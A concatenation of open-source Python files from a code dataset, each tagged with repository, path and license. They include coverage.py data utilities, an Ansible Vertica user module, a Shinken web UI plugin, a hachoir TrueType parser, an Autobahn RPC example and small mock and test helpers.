self.warn(str(exc))
else:
data.update(new_data, aliases=aliases)
file_be_gone(f)
def canonicalize_json_data(data):
"""Canonicalize our JSON data so it can be compared."""
for fname, lines in iitems(data.get('lines', {})):
data['lines'][fname] = sorted(lines)
for fname, arcs in iitems(data.get('arcs', {})):
data['arcs'][fname] = sorted(arcs)
def pretty_data(data):
"""Format data as JSON, but as nicely as possible.
Returns a string.
"""
# Start with a basic JSON dump.
out = json.dumps(data, indent=4, sort_keys=True)
# But pairs of numbers shouldn't be split across lines...
out = re.sub(r"\[\s+(-?\d+),\s+(-?\d+)\s+]", r"[\1, \2]", out)
# Trailing spaces mess with tests, get rid of them.
out = re.sub(r"(?m)\s+$", "", out)
return out
def debug_main(args):
"""Dump the raw data from data files.
Run this as::
$ python -m coverage.data [FILE]
"""
parser = optparse.OptionParser()
parser.add_option(
"-c", "--canonical", action="store_true",
help="Sort data into a canonical order",
)
options, args = parser.parse_args(args)
for filename in (args or [".coverage"]):
print("--- {0} ------------------------------".format(filename))
data = CoverageData._read_raw_data_file(filename)
if options.canonical:
canonicalize_json_data(data)
print(pretty_data(data))
if __name__ == '__main__':
import sys
debug_main(sys.argv[1:])
| bsd-3-clause |
cmap/cmapPy | cmapPy/clue_api_client/mock_clue_api_client.py | 1 | 1622 | import logging
import cmapPy.clue_api_client.setup_logger as setup_logger
import cmapPy.clue_api_client.clue_api_client as clue_api_client
__authors__ = "David L. Lahr"
__email__ = "[email protected]"
logger = logging.getLogger(setup_logger.LOGGER_NAME)
class MockClueApiClient(clue_api_client.ClueApiClient):
def __init__(self, base_url=None, user_key=None, default_return_values=None, filter_query_result=None,
count_query_result=None, post_result=None, delete_result=None, put_result=None):
super(MockClueApiClient, self).__init__(base_url=base_url, user_key=user_key)
self.default_return_values = default_return_values if default_return_values else []
self.filter_query_result = filter_query_result if filter_query_result else self.default_return_values
self.count_query_result = count_query_result if count_query_result else self.default_return_values
self.post_result = post_result if post_result else self.default_return_values
self.delete_result = delete_result if delete_result else self.default_return_values
self.put_result = put_result if put_result else self.default_return_values
def run_filter_query(self, resource_name, filter_clause):
return self.filter_query_result
def run_count_query(self, resource_name, where_clause):
return self.count_query_result
def run_post(self, resource_name, data):
return self.post_result
def run_delete(self, resource_name, id):
return self.delete_result
def run_put(self, resource_name, id, data):
return self.put_result
| bsd-3-clause |
maxamillion/ansible-modules-extras | database/vertica/vertica_user.py | 15 | 14712 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = """
---
module: vertica_user
version_added: '2.0'
short_description: Adds or removes Vertica database users and assigns roles.
description:
- Adds or removes Vertica database user and, optionally, assigns roles.
- A user will not be removed until all the dependencies have been dropped.
- In such a situation, if the module tries to remove the user it
will fail and only remove roles granted to the user.
options:
name:
description:
- Name of the user to add or remove.
required: true
profile:
description:
- Sets the user's profile.
required: false
default: null
resource_pool:
description:
- Sets the user's resource pool.
required: false
default: null
password:
description:
- The user's password encrypted by the MD5 algorithm.
- The password must be generated with the format C("md5" + md5[password + username]),
resulting in a total of 35 characters. An easy way to do this is by querying
the Vertica database with select 'md5'||md5('<user_password><user_name>').
required: false
default: null
expired:
description:
- Sets the user's password expiration.
required: false
default: null
ldap:
description:
- Set to true if users are authenticated via LDAP.
- The user will be created with password expired and set to I($ldap$).
required: false
default: null
roles:
description:
- Comma separated list of roles to assign to the user.
aliases: ['role']
required: false
default: null
state:
description:
- Whether to create C(present), drop C(absent) or lock C(locked) a user.
required: false
choices: ['present', 'absent', 'locked']
default: present
db:
description:
- Name of the Vertica database.
required: false
default: null
cluster:
description:
- Name of the Vertica cluster.
required: false
default: localhost
port:
description:
- Vertica cluster port to connect to.
required: false
default: 5433
login_user:
description:
- The username used to authenticate with.
required: false
default: dbadmin
login_password:
description:
- The password used to authenticate with.
required: false
default: null
notes:
- The default authentication assumes that you are either logging in as or sudo'ing
to the C(dbadmin) account on the host.
- This module uses C(pyodbc), a Python ODBC database adapter. You must ensure
that C(unixODBC) and C(pyodbc) is installed on the host and properly configured.
- Configuring C(unixODBC) for Vertica requires C(Driver = /opt/vertica/lib64/libverticaodbc.so)
to be added to the C(Vertica) section of either C(/etc/odbcinst.ini) or C($HOME/.odbcinst.ini)
and both C(ErrorMessagesPath = /opt/vertica/lib64) and C(DriverManagerEncoding = UTF-16)
to be added to the C(Driver) section of either C(/etc/vertica.ini) or C($HOME/.vertica.ini).
requirements: [ 'unixODBC', 'pyodbc' ]
author: "Dariusz Owczarek (@dareko)"
"""
EXAMPLES = """
- name: creating a new vertica user with password
vertica_user: name=user_name password=md5<encrypted_password> db=db_name state=present
- name: creating a new vertica user authenticated via ldap with roles assigned
vertica_user:
name=user_name
ldap=true
db=db_name
roles=schema_name_ro
state=present
"""
try:
import pyodbc
except ImportError:
pyodbc_found = False
else:
pyodbc_found = True
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
class NotSupportedError(Exception):
pass
class CannotDropError(Exception):
pass
# module specific functions
def get_user_facts(cursor, user=''):
facts = {}
cursor.execute("""
select u.user_name, u.is_locked, u.lock_time,
p.password, p.acctexpired as is_expired,
u.profile_name, u.resource_pool,
u.all_roles, u.default_roles
from users u join password_auditor p on p.user_id = u.user_id
where not u.is_super_user
and (? = '' or u.user_name ilike ?)
""", user, user)
while True:
rows = cursor.fetchmany(100)
if not rows:
break
for row in rows:
user_key = row.user_name.lower()
facts[user_key] = {
'name': row.user_name,
'locked': str(row.is_locked),
'password': row.password,
'expired': str(row.is_expired),
'profile': row.profile_name,
'resource_pool': row.resource_pool,
'roles': [],
'default_roles': []}
if row.is_locked:
facts[user_key]['locked_time'] = str(row.lock_time)
if row.all_roles:
facts[user_key]['roles'] = row.all_roles.replace(' ', '').split(',')
if row.default_roles:
facts[user_key]['default_roles'] = row.default_roles.replace(' ', '').split(',')
return facts
def update_roles(user_facts, cursor, user,
existing_all, existing_default, required):
del_roles = list(set(existing_all) - set(required))
if del_roles:
cursor.execute("revoke {0} from {1}".format(','.join(del_roles), user))
new_roles = list(set(required) - set(existing_all))
if new_roles:
cursor.execute("grant {0} to {1}".format(','.join(new_roles), user))
if required:
cursor.execute("alter user {0} default role {1}".format(user, ','.join(required)))
def check(user_facts, user, profile, resource_pool,
locked, password, expired, ldap, roles):
user_key = user.lower()
if user_key not in user_facts:
return False
if profile and profile != user_facts[user_key]['profile']:
return False
if resource_pool and resource_pool != user_facts[user_key]['resource_pool']:
return False
if locked != (user_facts[user_key]['locked'] == 'True'):
return False
if password and password != user_facts[user_key]['password']:
return False
if expired is not None and expired != (user_facts[user_key]['expired'] == 'True') or \
ldap is not None and ldap != (user_facts[user_key]['expired'] == 'True'):
return False
if roles and (cmp(sorted(roles), sorted(user_facts[user_key]['roles'])) != 0 or \
cmp(sorted(roles), sorted(user_facts[user_key]['default_roles'])) != 0):
return False
return True
def present(user_facts, cursor, user, profile, resource_pool,
locked, password, expired, ldap, roles):
user_key = user.lower()
if user_key not in user_facts:
query_fragments = ["create user {0}".format(user)]
if locked:
query_fragments.append("account lock")
if password or ldap:
if password:
query_fragments.append("identified by '{0}'".format(password))
else:
query_fragments.append("identified by '$ldap$'")
if expired or ldap:
query_fragments.append("password expire")
if profile:
query_fragments.append("profile {0}".format(profile))
if resource_pool:
query_fragments.append("resource pool {0}".format(resource_pool))
cursor.execute(' '.join(query_fragments))
if resource_pool and resource_pool != 'general':
cursor.execute("grant usage on resource pool {0} to {1}".format(
resource_pool, user))
update_roles(user_facts, cursor, user, [], [], roles)
user_facts.update(get_user_facts(cursor, user))
return True
else:
changed = False
query_fragments = ["alter user {0}".format(user)]
if locked is not None and locked != (user_facts[user_key]['locked'] == 'True'):
if locked:
state = 'lock'
else:
state = 'unlock'
query_fragments.append("account {0}".format(state))
changed = True
if password and password != user_facts[user_key]['password']:
query_fragments.append("identified by '{0}'".format(password))
changed = True
if ldap:
if ldap != (user_facts[user_key]['expired'] == 'True'):
query_fragments.append("password expire")
changed = True
elif expired is not None and expired != (user_facts[user_key]['expired'] == 'True'):
if expired:
query_fragments.append("password expire")
changed = True
else:
raise NotSupportedError("Unexpiring user password is not supported.")
if profile and profile != user_facts[user_key]['profile']:
query_fragments.append("profile {0}".format(profile))
changed = True
if resource_pool and resource_pool != user_facts[user_key]['resource_pool']:
query_fragments.append("resource pool {0}".format(resource_pool))
if user_facts[user_key]['resource_pool'] != 'general':
cursor.execute("revoke usage on resource pool {0} from {1}".format(
user_facts[user_key]['resource_pool'], user))
if resource_pool != 'general':
cursor.execute("grant usage on resource pool {0} to {1}".format(
resource_pool, user))
changed = True
if changed:
cursor.execute(' '.join(query_fragments))
if roles and (cmp(sorted(roles), sorted(user_facts[user_key]['roles'])) != 0 or \
cmp(sorted(roles), sorted(user_facts[user_key]['default_roles'])) != 0):
update_roles(user_facts, cursor, user,
user_facts[user_key]['roles'], user_facts[user_key]['default_roles'], roles)
changed = True
if changed:
user_facts.update(get_user_facts(cursor, user))
return changed
def absent(user_facts, cursor, user, roles):
user_key = user.lower()
if user_key in user_facts:
update_roles(user_facts, cursor, user,
user_facts[user_key]['roles'], user_facts[user_key]['default_roles'], [])
try:
cursor.execute("drop user {0}".format(user_facts[user_key]['name']))
except pyodbc.Error:
raise CannotDropError("Dropping user failed due to dependencies.")
del user_facts[user_key]
return True
else:
return False
# module logic
def main():
module = AnsibleModule(
argument_spec=dict(
user=dict(required=True, aliases=['name']),
profile=dict(default=None),
resource_pool=dict(default=None),
password=dict(default=None),
expired=dict(type='bool', default=None),
ldap=dict(type='bool', default=None),
roles=dict(default=None, aliases=['role']),
state=dict(default='present', choices=['absent', 'present', 'locked']),
db=dict(default=None),
cluster=dict(default='localhost'),
port=dict(default='5433'),
login_user=dict(default='dbadmin'),
login_password=dict(default=None),
), supports_check_mode = True)
if not pyodbc_found:
module.fail_json(msg="The python pyodbc module is required.")
user = module.params['user']
profile = module.params['profile']
if profile:
profile = profile.lower()
resource_pool = module.params['resource_pool']
if resource_pool:
resource_pool = resource_pool.lower()
password = module.params['password']
expired = module.params['expired']
ldap = module.params['ldap']
roles = []
if module.params['roles']:
roles = module.params['roles'].split(',')
roles = filter(None, roles)
state = module.params['state']
if state == 'locked':
locked = True
else:
locked = False
db = ''
if module.params['db']:
db = module.params['db']
changed = False
try:
dsn = (
"Driver=Vertica;"
"Server={0};"
"Port={1};"
"Database={2};"
"User={3};"
"Password={4};"
"ConnectionLoadBalance={5}"
).format(module.params['cluster'], module.params['port'], db,
module.params['login_user'], module.params['login_password'], 'true')
db_conn = pyodbc.connect(dsn, autocommit=True)
cursor = db_conn.cursor()
except Exception:
e = get_exception()
module.fail_json(msg="Unable to connect to database: {0}.".format(e))
try:
user_facts = get_user_facts(cursor)
if module.check_mode:
changed = not check(user_facts, user, profile, resource_pool,
locked, password, expired, ldap, roles)
elif state == 'absent':
try:
changed = absent(user_facts, cursor, user, roles)
except pyodbc.Error:
e = get_exception()
module.fail_json(msg=str(e))
elif state in ['present', 'locked']:
try:
changed = present(user_facts, cursor, user, profile, resource_pool,
locked, password, expired, ldap, roles)
except pyodbc.Error:
e = get_exception()
module.fail_json(msg=str(e))
except NotSupportedError:
e = get_exception()
module.fail_json(msg=str(e), ansible_facts={'vertica_users': user_facts})
except CannotDropError:
e = get_exception()
module.fail_json(msg=str(e), ansible_facts={'vertica_users': user_facts})
except SystemExit:
# avoid catching this on python 2.4
raise
except Exception:
e = get_exception()
module.fail_json(msg=e)
module.exit_json(changed=changed, user=user, ansible_facts={'vertica_users': user_facts})
if __name__ == '__main__':
main()
| gpl-3.0 |
baloo/shinken | shinken/webui/plugins/flow/flow.py | 1 | 3289 | ### Will be populated by the UI with it's own value
app = None
import time
from shinken.webui.bottle import redirect
from shinken.modules.webui_broker.helper import hst_srv_sort
from shinken.util import safe_print
try:
import json
except ImportError:
# For old Python version, load
# simple json (it can be hard json?! It's 2 functions guy!)
try:
import simplejson as json
except ImportError:
print "Error : you need the json or simplejson module"
raise
# Get the div for each element
def get_div(elt):
icon = app.helper.get_icon_state(elt)
stars = ''
for i in range(2, elt.business_impact):
stars += '''<div class="criticity-inpb-icon-%d">
<img src="/static/images/star.png">
</div>''' % (i-1)
lnk = app.helper.get_link_dest(elt)
button = app.helper.get_button('', img='/static/images/search.png')
button_recheck = '''<a href="#" onclick="recheck_now('%s')">%s</a>''' % (elt.get_full_name(), app.helper.get_button('Recheck', img='/static/images/delay.gif'))
button_ack = '''<a href="#" onclick="acknowledge('%s')">%s</a>''' % (elt.get_full_name(), app.helper.get_button('Ack', img='/static/images/wrench.png'))
pulse = ''
if elt.is_problem or (elt.state_id != 0 and elt.business_impact > 2):
pulse = '<span class="wall-pulse pulse" title=""></span>'
s = """
%s
%s
<div class="item-icon">
<img class="wall-icon" src="%s"></img>
</div>
<div class="item-text">
<span class="state_%s">%s %s</span>
</div>
<div class="item-button">
<a href="%s">%s</a>
</div>
<div class="recheck-button">
%s
</div>
<div class="ack-button">
%s
</div>
""" % (stars, pulse, icon, elt.state.lower(), elt.state, elt.get_full_name(), lnk, button, button_recheck, button_ack)
s = s.encode('utf8', 'ignore')
return s
# Our page
def get_page():
# First we look for the user sid
# so we bail out if it's a false one
user = app.get_user_auth()
if not user:
redirect("/user/login")
all_imp_impacts = app.datamgr.get_important_elements()
all_imp_impacts.sort(hst_srv_sort)
#all_imp_impacts.sort(hst_srv_sort)
#all_imp_impacts = app.datamgr.get_services()#important_elements()
impacts = []
for imp in all_imp_impacts:
safe_print("FIND A BAD SERVICE IN IMPACTS", imp.get_dbg_name())
d = {'name' : imp.get_full_name().encode('utf8', 'ignore'),
"title": "My Image 3", "thumb": "/static/images/state_flapping.png", "zoom": "/static/images/state_flapping.png",
"html" : get_div(imp)}
impacts.append(d)
# Got in json format
#j_impacts = json.dumps(impacts)
# print "Return impact in json", j_impacts
all_pbs = app.datamgr.get_all_problems()
now = time.time()
# Get only the last 10min errors
all_pbs = [pb for pb in all_pbs if pb.last_state_change > now - 600]
# And sort it
all_pbs.sort(hst_srv_sort)#sort_by_last_state_change)
return {'app' : app, 'user' : user, 'impacts' : impacts, 'problems' : all_pbs}
pages = {get_page : { 'routes' : ['/flow/'], 'view' : 'flow', 'static' : True}}
| agpl-3.0 |
alberttjahyono/posrepo | UbUjian/vendor/doctrine/orm/docs/en/conf.py | 2448 | 6497 | # -*- coding: utf-8 -*-
#
# Doctrine 2 ORM documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 3 18:10:24 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('_exts'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['configurationblock']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Doctrine 2 ORM'
copyright = u'2010-12, Doctrine Project Team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2'
# The full version, including alpha/beta/rc tags.
release = '2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
language = 'en'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'doctrine'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Doctrine2ORMdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Doctrine2ORM.tex', u'Doctrine 2 ORM Documentation',
u'Doctrine Project Team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
primary_domain = "dcorm"
def linkcode_resolve(domain, info):
if domain == 'dcorm':
return 'http://'
return None
| apache-2.0 |
brototyp/CouchPotato | library/hachoir_parser/misc/ttf.py | 95 | 9417 | """
TrueType Font parser.
Documents:
- "An Introduction to TrueType Fonts: A look inside the TTF format"
written by "NRSI: Computers & Writing Systems"
http://scripts.sil.org/cms/scripts/page.php?site_id=nrsi&item_id=IWS-Chapter08
Author: Victor Stinner
Creation date: 2007-02-08
"""
from hachoir_parser import Parser
from hachoir_core.field import (FieldSet, ParserError,
UInt16, UInt32, Bit, Bits,
PaddingBits, NullBytes,
String, RawBytes, Bytes, Enum,
TimestampMac32)
from hachoir_core.endian import BIG_ENDIAN
from hachoir_core.text_handler import textHandler, hexadecimal, filesizeHandler
MAX_NAME_COUNT = 300
MIN_NB_TABLE = 3
MAX_NB_TABLE = 30
DIRECTION_NAME = {
0: u"Mixed directional",
1: u"Left to right",
2: u"Left to right + neutrals",
-1: u"Right to left",
-2: u"Right to left + neutrals",
}
NAMEID_NAME = {
0: u"Copyright notice",
1: u"Font family name",
2: u"Font subfamily name",
3: u"Unique font identifier",
4: u"Full font name",
5: u"Version string",
6: u"Postscript name",
7: u"Trademark",
8: u"Manufacturer name",
9: u"Designer",
10: u"Description",
11: u"URL Vendor",
12: u"URL Designer",
13: u"License Description",
14: u"License info URL",
16: u"Preferred Family",
17: u"Preferred Subfamily",
18: u"Compatible Full",
19: u"Sample text",
20: u"PostScript CID findfont name",
}
PLATFORM_NAME = {
0: "Unicode",
1: "Macintosh",
2: "ISO",
3: "Microsoft",
4: "Custom",
}
CHARSET_MAP = {
# (platform, encoding) => charset
0: {3: "UTF-16-BE"},
1: {0: "MacRoman"},
3: {1: "UTF-16-BE"},
}
class TableHeader(FieldSet):
def createFields(self):
yield String(self, "tag", 4)
yield textHandler(UInt32(self, "checksum"), hexadecimal)
yield UInt32(self, "offset")
yield filesizeHandler(UInt32(self, "size"))
def createDescription(self):
return "Table entry: %s (%s)" % (self["tag"].display, self["size"].display)
class NameHeader(FieldSet):
def createFields(self):
yield Enum(UInt16(self, "platformID"), PLATFORM_NAME)
yield UInt16(self, "encodingID")
yield UInt16(self, "languageID")
yield Enum(UInt16(self, "nameID"), NAMEID_NAME)
yield UInt16(self, "length")
yield UInt16(self, "offset")
def getCharset(self):
platform = self["platformID"].value
encoding = self["encodingID"].value
try:
return CHARSET_MAP[platform][encoding]
except KeyError:
self.warning("TTF: Unknown charset (%s,%s)" % (platform, encoding))
return "ISO-8859-1"
def createDescription(self):
platform = self["platformID"].display
name = self["nameID"].display
return "Name record: %s (%s)" % (name, platform)
def parseFontHeader(self):
yield UInt16(self, "maj_ver", "Major version")
yield UInt16(self, "min_ver", "Minor version")
yield UInt16(self, "font_maj_ver", "Font major version")
yield UInt16(self, "font_min_ver", "Font minor version")
yield textHandler(UInt32(self, "checksum"), hexadecimal)
yield Bytes(self, "magic", 4, r"Magic string (\x5F\x0F\x3C\xF5)")
if self["magic"].value != "\x5F\x0F\x3C\xF5":
raise ParserError("TTF: invalid magic of font header")
# Flags
yield Bit(self, "y0", "Baseline at y=0")
yield Bit(self, "x0", "Left sidebearing point at x=0")
yield Bit(self, "instr_point", "Instructions may depend on point size")
yield Bit(self, "ppem", "Force PPEM to integer values for all")
yield Bit(self, "instr_width", "Instructions may alter advance width")
yield Bit(self, "vertical", "e laid out vertically?")
yield PaddingBits(self, "reserved[]", 1)
yield Bit(self, "linguistic", "Requires layout for correct linguistic rendering?")
yield Bit(self, "gx", "Metamorphosis effects?")
yield Bit(self, "strong", "Contains strong right-to-left glyphs?")
yield Bit(self, "indic", "contains Indic-style rearrangement effects?")
yield Bit(self, "lossless", "Data is lossless (Agfa MicroType compression)")
yield Bit(self, "converted", "Font converted (produce compatible metrics)")
yield Bit(self, "cleartype", "Optimised for ClearType")
yield Bits(self, "adobe", 2, "(used by Adobe)")
yield UInt16(self, "unit_per_em", "Units per em")
if not(16 <= self["unit_per_em"].value <= 16384):
raise ParserError("TTF: Invalid unit/em value")
yield UInt32(self, "created_high")
yield TimestampMac32(self, "created")
yield UInt32(self, "modified_high")
yield TimestampMac32(self, "modified")
yield UInt16(self, "xmin")
yield UInt16(self, "ymin")
yield UInt16(self, "xmax")
yield UInt16(self, "ymax")
# Mac style
yield Bit(self, "bold")
yield Bit(self, "italic")
yield Bit(self, "underline")
yield Bit(self, "outline")
yield Bit(self, "shadow")
yield Bit(self, "condensed", "(narrow)")
yield Bit(self, "expanded")
yield PaddingBits(self, "reserved[]", 9)
yield UInt16(self, "lowest", "Smallest readable size in pixels")
yield Enum(UInt16(self, "font_dir", "Font direction hint"), DIRECTION_NAME)
yield Enum(UInt16(self, "ofst_format"), {0: "short offsets", 1: "long"})
yield UInt16(self, "glyph_format", "(=0)")
def parseNames(self):
# Read header
yield UInt16(self, "format")
if self["format"].value != 0:
raise ParserError("TTF (names): Invalid format (%u)" % self["format"].value)
yield UInt16(self, "count")
yield UInt16(self, "offset")
if MAX_NAME_COUNT < self["count"].value:
raise ParserError("Invalid number of names (%s)"
% self["count"].value)
# Read name index
entries = []
for index in xrange(self["count"].value):
entry = NameHeader(self, "header[]")
yield entry
entries.append(entry)
# Sort names by their offset
entries.sort(key=lambda field: field["offset"].value)
# Read name value
last = None
for entry in entries:
# Skip duplicates values
new = (entry["offset"].value, entry["length"].value)
if last and last == new:
self.warning("Skip duplicate %s %s" % (entry.name, new))
continue
last = (entry["offset"].value, entry["length"].value)
# Skip negative offset
offset = entry["offset"].value + self["offset"].value
if offset < self.current_size//8:
self.warning("Skip value %s (negative offset)" % entry.name)
continue
# Add padding if any
padding = self.seekByte(offset, relative=True, null=True)
if padding:
yield padding
# Read value
size = entry["length"].value
if size:
yield String(self, "value[]", size, entry.description, charset=entry.getCharset())
padding = (self.size - self.current_size) // 8
if padding:
yield NullBytes(self, "padding_end", padding)
class Table(FieldSet):
TAG_INFO = {
"head": ("header", "Font header", parseFontHeader),
"name": ("names", "Names", parseNames),
}
def __init__(self, parent, name, table, **kw):
FieldSet.__init__(self, parent, name, **kw)
self.table = table
tag = table["tag"].value
if tag in self.TAG_INFO:
self._name, self._description, self.parser = self.TAG_INFO[tag]
else:
self.parser = None
def createFields(self):
if self.parser:
for field in self.parser(self):
yield field
else:
yield RawBytes(self, "content", self.size//8)
def createDescription(self):
return "Table %s (%s)" % (self.table["tag"].value, self.table.path)
class TrueTypeFontFile(Parser):
endian = BIG_ENDIAN
PARSER_TAGS = {
"id": "ttf",
"category": "misc",
"file_ext": ("ttf",),
"min_size": 10*8, # FIXME
"description": "TrueType font",
}
def validate(self):
if self["maj_ver"].value != 1:
return "Invalid major version (%u)" % self["maj_ver"].value
if self["min_ver"].value != 0:
return "Invalid minor version (%u)" % self["min_ver"].value
if not (MIN_NB_TABLE <= self["nb_table"].value <= MAX_NB_TABLE):
return "Invalid number of table (%u)" % self["nb_table"].value
return True
def createFields(self):
yield UInt16(self, "maj_ver", "Major version")
yield UInt16(self, "min_ver", "Minor version")
yield UInt16(self, "nb_table")
yield UInt16(self, "search_range")
yield UInt16(self, "entry_selector")
yield UInt16(self, "range_shift")
tables = []
for index in xrange(self["nb_table"].value):
table = TableHeader(self, "table_hdr[]")
yield table
tables.append(table)
tables.sort(key=lambda field: field["offset"].value)
for table in tables:
padding = self.seekByte(table["offset"].value, null=True)
if padding:
yield padding
size = table["size"].value
if size:
yield Table(self, "table[]", table, size=size*8)
padding = self.seekBit(self.size, null=True)
if padding:
yield padding
| gpl-3.0 |
ahmedbodi/AutobahnPython | examples/twisted/wamp1/rpc/simple/example2/server.py | 17 | 3564 | ###############################################################################
##
## Copyright (C) 2011-2014 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
import sys, math
from twisted.python import log
from twisted.internet import reactor, defer
from twisted.web.server import Site
from twisted.web.static import File
from autobahn.twisted.websocket import listenWS
from autobahn.wamp1.protocol import exportRpc, \
WampServerFactory, \
WampServerProtocol
class Calc:
"""
A simple calc service we will export for Remote Procedure Calls (RPC).
All you need to do is use the @exportRpc decorator on methods
you want to provide for RPC and register a class instance in the
server factory (see below).
The method will be exported under the Python method name, or
under the (optional) name you can provide as an argument to the
decorator (see asyncSum()).
"""
@exportRpc
def add(self, x, y):
return x + y
@exportRpc
def sub(self, x, y):
return x - y
@exportRpc
def square(self, x):
MAX = 1000
if x > MAX:
## raise a custom exception
raise Exception("http://example.com/error#number_too_big",
"%d too big for me, max is %d" % (x, MAX),
MAX)
return x * x
@exportRpc
def sum(self, list):
return reduce(lambda x, y: x + y, list)
@exportRpc
def pickySum(self, list):
errs = []
for i in list:
if i % 3 == 0:
errs.append(i)
if len(errs) > 0:
raise Exception("http://example.com/error#invalid_numbers",
"one or more numbers are multiples of 3",
errs)
return reduce(lambda x, y: x + y, list)
@exportRpc
def sqrt(self, x):
return math.sqrt(x)
@exportRpc("asum")
def asyncSum(self, list):
## Simulate a slow function.
d = defer.Deferred()
reactor.callLater(3, d.callback, self.sum(list))
return d
class SimpleServerProtocol(WampServerProtocol):
"""
Demonstrates creating a simple server with Autobahn WebSockets that
responds to RPC calls.
"""
def onSessionOpen(self):
# when connection is established, we create our
# service instances ...
self.calc = Calc()
# .. and register them for RPC. that's it.
self.registerForRpc(self.calc, "http://example.com/simple/calc#")
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == 'debug':
log.startLogging(sys.stdout)
debug = True
else:
debug = False
factory = WampServerFactory("ws://localhost:9000", debugWamp = debug)
factory.protocol = SimpleServerProtocol
factory.setProtocolOptions(allowHixie76 = True)
listenWS(factory)
webdir = File(".")
web = Site(webdir)
reactor.listenTCP(8080, web)
reactor.run()
| apache-2.0 |
sameetb-cuelogic/edx-platform-test | common/djangoapps/enrollment/tests/fake_data_api.py | 26 | 3120 | """
A Fake Data API for testing purposes.
"""
import copy
import datetime
_DEFAULT_FAKE_MODE = {
"slug": "honor",
"name": "Honor Code Certificate",
"min_price": 0,
"suggested_prices": "",
"currency": "usd",
"expiration_datetime": None,
"description": None
}
_ENROLLMENTS = []
